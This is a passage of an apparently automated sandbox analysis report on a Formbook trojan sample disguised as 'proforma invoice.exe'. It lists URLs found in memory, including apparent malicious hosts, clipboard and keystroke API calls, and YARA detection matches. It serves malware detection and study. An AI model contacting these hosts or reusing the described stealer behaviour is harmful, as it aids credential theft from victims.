            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Buy_Mutual_Funds.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Financial_Services.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Resume_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzp
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2033778728.000000000805C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.4104507554.0000000005944000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000002FC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B744000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4104507554.0000000005944000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000002FC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B744000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&amp;AZOTcfex=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1EAFF
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B1ED6A
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1EAFF
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B0AA57
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B39576

            E-Banking Fraud

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
